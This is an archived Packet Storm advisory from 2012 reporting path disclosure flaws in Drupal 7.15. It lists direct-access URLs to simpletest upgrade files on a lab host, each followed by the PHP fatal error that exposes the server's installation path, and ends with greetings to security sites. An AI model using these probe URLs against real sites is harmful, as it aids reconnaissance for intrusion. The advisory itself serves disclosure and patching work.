what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Drupal 7.15 Path Disclosure

Drupal 7.15 Path Disclosure
Posted Sep 24, 2012
Authored by Akastep

Drupal version 7.15 suffers from multiple path disclosure vulnerabilities.

tags | exploit, vulnerability
SHA-256 | da97f6c6b621a645409067c51ab630e17eccce383e667955d67f4fe8018bec3e
Download | Favorite | View

Drupal 7.15 Path Disclosure

Change Mirror Download
============================================================
Vulnerable Software: Drupal 7.15
Downloaded from: http://ftp.drupal.org/files/projects/drupal-7.15.tar.gz
Vuln Type: Path Disclosure
============================================================
Tested:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
MYSQL:  5.5.27
============================================================

Drupal 7.15 is vulnerable to Path Disclosure.

My installation PATH is: 
C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\drupal715\drupal-7.15\


Try Direct access and it will expose such information:

=========================================================================================

http://192.168.0.15/learn/drupal715/drupal-7.15/modules/simpletest/tests/upgrade/drupal-6.bare.database.php


Fatal error: Call to undefined function db_create_table() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\drupal715\drupal-7.15\modules\simpletest\tests\upgrade\drupal-6.bare.database.php on line 17

=========================================================================================

http://192.168.0.15/learn/drupal715/drupal-7.15/modules/simpletest/tests/upgrade/drupal-6.comments.database.php

Fatal error: Call to undefined function db_update() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\drupal715\drupal-7.15\modules\simpletest\tests\upgrade\drupal-6.comments.database.php on line 2

=========================================================================================

http://192.168.0.15/learn/drupal715/drupal-7.15/modules/simpletest/tests/upgrade/drupal-6.filled.database.php

Fatal error: Call to undefined function db_create_table() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\drupal715\drupal-7.15\modules\simpletest\tests\upgrade\drupal-6.filled.database.php on line 26

=========================================================================================

http://192.168.0.15/learn/drupal715/drupal-7.15/modules/simpletest/tests/upgrade/drupal-6.forum.database.php


Fatal error: Call to undefined function db_create_table() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\drupal715\drupal-7.15\modules\simpletest\tests\upgrade\drupal-6.forum.database.php on line 7

=========================================================================================

http://192.168.0.15/learn/drupal715/drupal-7.15/modules/simpletest/tests/upgrade/drupal-6.locale.database.php


Fatal error: Call to undefined function db_create_table() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\drupal715\drupal-7.15\modules\simpletest\tests\upgrade\drupal-6.locale.database.php on line 7

=========================================================================================

http://192.168.0.15/learn/drupal715/drupal-7.15/modules/simpletest/tests/upgrade/drupal-6.menu.database.php


Fatal error: Call to undefined function db_insert() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\drupal715\drupal-7.15\modules\simpletest\tests\upgrade\drupal-6.menu.database.php on line 2

=========================================================================================

http://192.168.0.15/learn/drupal715/drupal-7.15/modules/simpletest/tests/upgrade/drupal-6.node_type_broken.database.php


Fatal error: Call to undefined function db_insert() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\drupal715\drupal-7.15\modules\simpletest\tests\upgrade\drupal-6.node_type_broken.database.php on line 2

=========================================================================================

http://192.168.0.15/learn/drupal715/drupal-7.15/modules/simpletest/tests/upgrade/drupal-6.translatable.database.php

 Fatal error: Call to undefined function db_insert() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\drupal715\drupal-7.15\modules\simpletest\tests\upgrade\drupal-6.translatable.database.php on line 7

=========================================================================================

http://192.168.0.15/learn/drupal715/drupal-7.15/modules/simpletest/tests/upgrade/drupal-6.trigger.database.php


Fatal error: Call to undefined function db_create_table() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\drupal715\drupal-7.15\modules\simpletest\tests\upgrade\drupal-6.trigger.database.php on line 6


=========================================================================================

http://192.168.0.15/learn/drupal715/drupal-7.15/modules/simpletest/tests/upgrade/drupal-6.upload.database.php



Fatal error: Call to undefined function db_insert() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\drupal715\drupal-7.15\modules\simpletest\tests\upgrade\drupal-6.upload.database.php on line 3

=========================================================================================

http://192.168.0.15/learn/drupal715/drupal-7.15/modules/simpletest/tests/upgrade/drupal-6.user-no-password-token.database.php


Fatal error: Call to undefined function db_insert() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\drupal715\drupal-7.15\modules\simpletest\tests\upgrade\drupal-6.user-no-password-token.database.php on line 2

=========================================================================================

http://192.168.0.15/learn/drupal715/drupal-7.15/modules/simpletest/tests/upgrade/drupal-6.user-password-token.database.php


Fatal error: Call to undefined function db_insert() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\drupal715\drupal-7.15\modules\simpletest\tests\upgrade\drupal-6.user-password-token.database.php on line 2

=========================================================================================

http://192.168.0.15/learn/drupal715/drupal-7.15/modules/simpletest/tests/upgrade/drupal-7.field.database.php

 Fatal error: Call to undefined function db_insert() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\drupal715\drupal-7.15\modules\simpletest\tests\upgrade\drupal-7.field.database.php on line 8
=========================================================================================

http://192.168.0.15/learn/drupal715/drupal-7.15/modules/simpletest/tests/upgrade/drupal-7.trigger.database.php

 Fatal error: Call to undefined function db_insert() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\drupal715\drupal-7.15\modules\simpletest\tests\upgrade\drupal-7.trigger.database.php on line 8

==========================NO ONE AND NOTHING IS IDEAL======================================



SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all Aa Team + to all Azerbaijan Black HatZ +
      *Especially to my bro CAMOUFL4G3.*
===========================================================

/AkaStep
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close